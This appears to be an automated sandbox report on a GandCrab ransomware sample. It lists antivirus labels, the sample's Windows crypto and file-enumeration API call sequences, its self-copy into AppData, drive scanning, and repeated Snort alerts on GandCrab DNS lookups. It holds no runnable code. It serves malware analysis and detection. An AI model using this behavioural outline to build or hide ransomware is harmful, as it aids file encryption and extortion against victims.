Source: 11.0.qvvfpl.exe.d70000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 1.0.eW1QrimJYd.exe.a80000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 11.2.qvvfpl.exe.d70000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 24.0.qvvfpl.exe.d70000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 1.2.eW1QrimJYd.exe.a80000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 24.2.qvvfpl.exe.d70000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A848A0 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,	1_2_00A848A0
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A87DB0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	1_2_00A87DB0
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A85D80 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	1_2_00A85D80
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A87C60 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	1_2_00A87C60
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A85750 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	1_2_00A85750
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A86000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	1_2_00A86000
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A85540 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	1_2_00A85540
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A85050 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,MultiByteToWideChar,GetLastError,VirtualAlloc,VirtualFree,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,	1_2_00A85050
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D748A0 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,	11_2_00D748A0
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D75D80 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	11_2_00D75D80
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D77DB0 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	11_2_00D77DB0
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D75750 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	11_2_00D75750
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D75050 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,MultiByteToWideChar,GetLastError,VirtualAlloc,VirtualFree,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,	11_2_00D75050
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D75540 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	11_2_00D75540
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D77C60 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	11_2_00D77C60
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D76000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	11_2_00D76000

Source: eW1QrimJYd.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: eW1QrimJYd.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: z:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: x:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: v:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: t:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: r:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: p:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: n:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: l:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: j:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: h:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: f:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: b:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: y:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: w:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: u:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: s:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: q:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: o:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: m:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: k:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: i:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: g:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: e:	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A864A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	1_2_00A864A0
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A866F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	1_2_00A866F0
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D766F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	11_2_00D766F0
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D764A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	11_2_00D764A0

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:62540 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:62541 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:62542 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:62543 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:54905 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:54906 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:54907 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:54908 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:51532 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:51533 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:51534 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:51535 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:56124 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:56125 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:56126 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:56127 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:61611 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:61612 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:61613 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:61614 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:52483 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:52484 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:52485 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:52486 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:53945 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:53946 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:53947 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:53948 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56088 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56089 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56090 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56091 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:56549 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:56550 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:56551 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:56552 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:59883 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:59884 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:59885 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:59886 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:58919 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:58920 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:58921 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:58922 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:50345 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:50346 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:50347 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:50348 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:55631 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:55632 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:55633 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:55634 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56571 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56572 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56573 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56574 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:49234 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:49235 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:49236 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:49237 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:56128 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:52867 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:52868 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:52869 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:52870 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:57324 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:57325 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:57326 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:57327 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:64406 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:64407 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:64408 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:64409 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:62850 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:62851 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:62852 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:62853 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:55958 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:55959 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:55960 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:55961 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:57517 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:57518 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:57519 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:57520 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:51323 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:51324 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:51325 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:51326 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:61091 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:61092 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:61093 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:61094 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:62768 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:62769 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:62770 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:60131 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:62734 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:62735 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:62736 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:62737 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:60692 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:60693 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:60694 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:60695 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:56752 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:56753 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:56754 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:56755 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:59338 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:59339 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:59340 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:59341 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:52717 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:52718 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:52719 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:52720 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:62223 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:62224 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:62225 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:62226 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:63265 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:63266 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:63267 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:63268 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:60000 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:60001 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:60002 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:60003 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:51774 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:51775 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:51776 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:51777 -> 8.8.8.8:53
